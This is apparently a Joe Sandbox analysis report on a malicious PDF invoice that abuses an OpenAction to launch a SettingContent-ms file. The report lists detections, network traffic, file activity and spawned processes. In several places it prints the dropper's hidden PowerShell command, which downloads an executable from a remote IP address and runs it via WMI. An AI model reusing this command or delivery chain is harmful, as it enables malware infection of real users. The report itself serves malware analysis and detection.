Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:618812
Start time:11:19:24
Joe Sandbox Product:Cloud
Start date:26.07.2018
Overall analysis duration:0h 6m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:inovoice-019338.pdf
Cookbook file name:defaultwindowspdfcookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal84.expl.evad.winPDF@12/13@0/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 22
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .pdf
  • Found PDF document
  • Simulate clicks
  • Security Warning found
  • Click Allow
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, mscorsvw.exe, svchost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: scmwrap.exe, powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold840 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: inovoice-019338.pdfAvira: Label: HTML/ExpKit.Gen
Multi AV Scanner detection for submitted fileShow sources
Source: inovoice-019338.pdfvirustotal: Detection: 54%Perma Link

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-msJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess created: C:\Windows\System32\scmwrap.exeJump to behavior
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 35.168.158.221:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 35.168.158.221:443

Networking:

barindex
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: ZAPPIE-HOST-ASZappieHostGB ZAPPIE-HOST-ASZappieHostGB
Urls found in memory or binary dataShow sources
Source: AcroRd32.exe, 00000005.00000003.10824445408.03A60000.00000004.sdmpString found in binary or memory: file:///
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/2z
Source: AcroRd32.exe, 00000005.00000003.10823562041.0493E000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/c/0
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/c/0RA
Source: AcroRd32.exe, 00000005.00000002.10901176395.07781000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/c/0Vector.
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/c/0file://AcrobatMedia028800/c/0
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/c/0file://AcrobatMedia028800/c/0file://AcrobatMedia028800/c/0
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: file://AcrobatMedia028800/c/0xi
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmpString found in binary or memory: http://
Source: downl.SettingContent-ms.5.drString found in binary or memory: http://169.239.129.117/cal
Source: AcroRd32.exe, 00000005.00000003.10817535854.040BE000.00000004.sdmpString found in binary or memory: http://RM
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://cipa.jp/exif/1.0/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
Source: AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmpString found in binary or memory: http://n
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
Source: AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmpString found in binary or memory: http://recentfiles
Source: AcroRd32.exe, 00000003.00000002.10737080559.02BEB000.00000004.sdmp, UserCache.bin.5.drString found in binary or memory: http://recentfiles.
Source: AcroRd32.exe, 00000003.00000002.10737080559.02BEB000.00000004.sdmp, UserCache.bin.5.drString found in binary or memory: http://recentfiles.com.adobe.acrobat.extensions.files_description
Source: AcroRd32.exe, 00000005.00000002.10885203376.040C5000.00000004.sdmpString found in binary or memory: http://w
Source: AcroRd32.exe, 00000005.00000002.10868648794.011ED000.00000004.sdmp, AcroRd32.exe, 00000005.00000002.10885309918.040EC000.00000004.sdmpString found in binary or memory: http://ww
Source: AcroRd32.exe, 00000003.00000003.10718748997.02BD5000.00000004.sdmpString found in binary or memory: http://www
Source: AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmpString found in binary or memory: http://www.adob
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/field#
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/type#
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmpString found in binary or memory: http://www.aiim.org/pdfe/ns/id/
Source: AcroRd32.exe, 00000005.00000003.10824445408.03A60000.00000004.sdmpString found in binary or memory: http://www.dictionary.com/cgi-bin/dict.pl?term=
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: http://www.macromedia.com
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: http://www.macromedia.comfile://AcrobatMedia028800/c/0file://AcrobatMedia028800
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmpString found in binary or memory: http://www.npes.org/pdfx/ns/id/
Source: AcroRd32.exe, 00000005.00000002.10891333143.04E2A000.00000004.sdmpString found in binary or memory: http://www.quicktime.com.Acrobat
Source: AcroRd32.exe, 00000005.00000002.10885309918.040EC000.00000004.sdmpString found in binary or memory: http://www.w3
Source: AcroRd32.exe, 00000005.00000003.10817535854.040BE000.00000004.sdmpString found in binary or memory: http://www.w3.o
Source: AcroRd32.exe, 00000005.00000002.10886990853.04321000.00000004.sdmp, AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmpString found in binary or memory: http://www.w3.or
Source: AcroRd32.exe, 00000003.00000003.10719111361.02B23000.00000004.sdmp, AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmpString found in binary or memory: https://
Source: AcroRd32.exe, 00000005.00000003.10824445408.03A60000.00000004.sdmpString found in binary or memory: https://idisk.mac.com/
Source: AcroRd32.exe, 00000005.00000003.10821737980.0406B000.00000004.sdmpString found in binary or memory: https://www.acro
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/$
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/broadcastMessage
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/xehttps://www.macromedia.com/support/flashplayer/
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443

System Summary:

barindex
Contains functionality to call native functionsShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8110 NtSetInformationFile,3_2_003D8110
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8210 NtOpenKey,3_2_003D8210
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8310 NtCreateSection,3_2_003D8310
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8000 NtCreateFile,3_2_003D8000
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8050 NtOpenFile,3_2_003D8050
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8250 NtOpenKeyEx,3_2_003D8250
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8350 NtOpenSection,3_2_003D8350
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8090 NtQueryAttributesFile,3_2_003D8090
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D8690 NtMapViewOfSection,3_2_003D8690
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D81D0 NtCreateKey,3_2_003D81D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 3_2_003D82D0 NtCreateMutant,3_2_003D82D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725050 NtOpenFile,5_2_00725050
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725250 NtOpenKeyEx,5_2_00725250
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725350 NtOpenSection,5_2_00725350
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725110 NtSetInformationFile,5_2_00725110
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725210 NtOpenKey,5_2_00725210
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725310 NtCreateSection,5_2_00725310
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725000 NtCreateFile,5_2_00725000
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_007251D0 NtCreateKey,5_2_007251D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_007252D0 NtCreateMutant,5_2_007252D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725090 NtQueryAttributesFile,5_2_00725090
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeCode function: 5_2_00725690 NtMapViewOfSection,5_2_00725690
.NET source code contains many API calls related to securityShow sources
Source: 10.0.scmwrap.exe.860000.2.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.2.unpack, Program.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.scmwrap.exe.860000.0.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.0.unpack, Program.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.1.scmwrap.exe.860000.0.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.1.scmwrap.exe.860000.0.unpack, Program.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.scmwrap.exe.860000.1.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.1.unpack, Program.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.scmwrap.exe.860000.2.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.2.scmwrap.exe.860000.2.unpack, Program.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.scmwrap.exe.860000.3.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.3.unpack, Program.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Classification labelShow sources
Source: classification engineClassification label: mal84.expl.evad.winPDF@12/13@0/2
Creates files inside the user directoryShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.datJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmpJump to behavior
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..R.....$.....$.#........K\..........K\........k.r.....kH._yHn..............Da......Da....$.......d...R.`....r..........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.......#.....~uh...............a.~u..0.....\...L...@...<...................#.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........ ......./...A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5...L...@...d.................../.........7}........"...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`......./.....~uh...............a.~u..0.....\...L...@......................./.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..R..... .......;...A.~u(...............a.~u..0.....\...L...@.......................;.........7}......R.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.......;.....~uh...............a.~u..0.....\...L...@.......................;.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..R..... .......G...A.~u(...............a.~u..0.....\...L...@.......................G.........7}......R.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.......G.....~uh...............a.~u..0.....\...L...@.......................G.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..R..... .......S...A.~u(...............a.~u..0.....\...L...@...-...................S.........7}......R.h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.......S.....~uh...............a.~u..0.....\...L...@...H...................S.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..R..... ......._...A.~u(...............a.~u..0.....\...L...@...p..................._.........7}......R.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`......._.....~uh...............a.~u..0.....\...L...@......................._.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........ .......k... . . .e.c.o.r.d.E.x.c.e.p.t.i.o.n...L...@.......................k.........7}........"...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.......k.....~uh...............a.~u..0.....\...L...@.......................k.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..R..... .......w...A.~u(...............a.~u..0.....\...L...@.......................w.........7}......R.Z...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.......w.....~uh...............a.~u..0.....\...L...@.......................w.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........ ........... .~u(...............a.~u..0.....\...L...@...9.............................7}........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........`.............~uh...............a.~u..0.....\...L...@...T...........................E.7}....P...................
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\scmwrap.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: inovoice-019338.pdfvirustotal: Detection: 54%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230
Source: unknownProcess created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Source: unknownProcess created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\inovoice-019338.pdf'
Source: unknownProcess created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf'
Source: unknownProcess created: C:\Windows\System32\scmwrap.exe 'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115aJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf'Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess created: C:\Windows\System32\scmwrap.exe 'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms'Jump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null) Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{591209c7-767b-42b2-9fba-44ee4615f2c7}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeFile opened: C:\Windows\system32\MSVCR100.dllJump to behavior

Data Obfuscation:

barindex
PDF contains an OpenAction to launch a SettingContent-ms fileShow sources
Source: inovoice-019338.pdfInitial sample:
PDF has an OpenAction (likely to launch a dropper script)Show sources
Source: inovoice-019338.pdfInitial sample: PDF keyword /OpenAction
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
